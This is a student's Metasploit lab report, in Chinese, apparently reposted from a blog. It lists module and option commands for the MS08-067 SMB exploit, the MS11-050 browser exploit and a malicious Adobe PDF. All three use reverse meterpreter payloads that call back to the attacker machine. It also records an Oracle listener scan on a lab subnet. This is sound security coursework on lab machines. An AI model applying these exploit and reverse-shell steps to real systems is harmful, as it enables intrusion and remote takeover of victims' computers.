20154319 实验五 MSF基础应用

一、实验内容

(1)一个主动攻击,如ms08_067;

(2) 一个针对浏览器的攻击,如ms11_050;

(3)一个针对客户端的攻击,如Adobe;

(4)成功应用任何一个辅助模块。

二、实验后问题回答

(1)用自己的话解释什么是exploit,payload,encode。

Exploit就是漏洞利用,有exploit肯定有漏洞,所以渗透攻击就是利用一个系统、应用或服务中的安全漏洞进行攻击;

Payload就是有效载荷,在渗透攻击后植入目标系统执行代码。

Encode就是编码,通过改变特征码,对攻击载荷进行“免杀”处理。

三、实验体会

这次实验是使用漏洞攻击,真的是做的特别的艰难了,自己的垃圾电脑带不起来两个虚拟机,跟同学合作用两台虚拟机经常ping不通(防火墙也关了,抓取ping包那个也设置了也不行),最后直接借了一台高配置的电脑完成的,心累啊~在实验中觉得要注意一下:配置的时候常用show options看看配置有没有错,有时候晕了的时候会把攻击的IP和靶机的设置反了,或者是有端口号会变之类的问题

四、实践过程

(一)windows服务渗透攻击(MS08-067漏洞攻击)

1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.236

2.启动msf终端。

使用search命令搜索该漏洞对应的模块:(可以看到漏洞的时间是2008年的)

启用该渗透攻击模块,选择运行后门回连控制端的攻击载荷,配置渗透攻击所需的配置项:

启用 :use exploit/windows/smb/ms08_067_netapi 

设置渗透目标IP: set RHOST 10.1.1.236 

设置攻击机端口: set LPORT 4319 

设置攻击机IP: set LHOST 10.1.1.242 

设置目标系统类型: set target 0 

 图一

3.发起渗透攻击显示攻击成功后,在攻击机上执行ipconfig命令验证结果,可以执行:

(二)浏览器渗透攻击(MS11-050漏洞攻击)

1. 使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.202

 

2. 启动msf终端。

使用search命令搜索该漏洞对应的模块:(这个漏洞明显是2011年,比第一个主动攻击的要新)

启用该渗透攻击模块,选择运行后门回连控制端的攻击载荷,配置渗透攻击所需的配置项:

设置攻击载荷为: set paylod windows/meterpreter/reverse_http 

(之前可用 show payloads 命令查看可用的,选中的是上面的那个)

设置标识: set URIPATH 4319 

设置端口: set LPORT 8443 

设置攻击机IP: set LHOST 10.1.1.242 

设置完成后键入 exploit 发起攻击:

图二~

3.在靶机中启动IE浏览器,访问链接http://10.1.1.242:8080/4319

图三

在攻击机MSF终端中可以看到如下信息:

4.使用sessions-l命令查看当前监听端的活动会话;

运行 sessions-i l 命令,选择接入ID号为1的当前靶机回连的会话;

输入命令 sysinfo ,可查看靶机的相关信息,攻击成功。

(三)Adobe阅读器渗透攻击

1.使攻击机与靶机相互ping通,攻击机IP:10.1.1.242,靶机IP:10.1.1.190

2.启动msf终端。

配置渗透攻击所需的配置项:

设置载荷: set payload windows/meterpreter/reverse_http 

设置攻击机IP: set LHOST 10.1.1.242 

设置端口: set LPORT 8443 

设置产生的文件: set FILENAME 4319.pdf 

设置完成后键入 exploit 

 

图四

3.根据路径找到该pdf文件放到靶机里。

4.使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连,并执行 exploit 

5.在靶机中双击打开该文件,监听端接到来自靶机的Meterpreter连接,输入命令 sysinfo ,可对靶机环境进行基本的查询,攻击成功:

 

★Oracle数据库服务查点

1.使用 tnslsnr_version 模块查找网络中开发端口的Oracle监听器服务。

 

2.扫描10.1.1.0/24这个区段的主机,设置线程为50,run开始扫描,扫描完成,但没有在网络中发现后台服务器上开放的Oracle数据库。

 

猜你喜欢

转载自www.cnblogs.com/zwl154319/p/8876425.html
今日推荐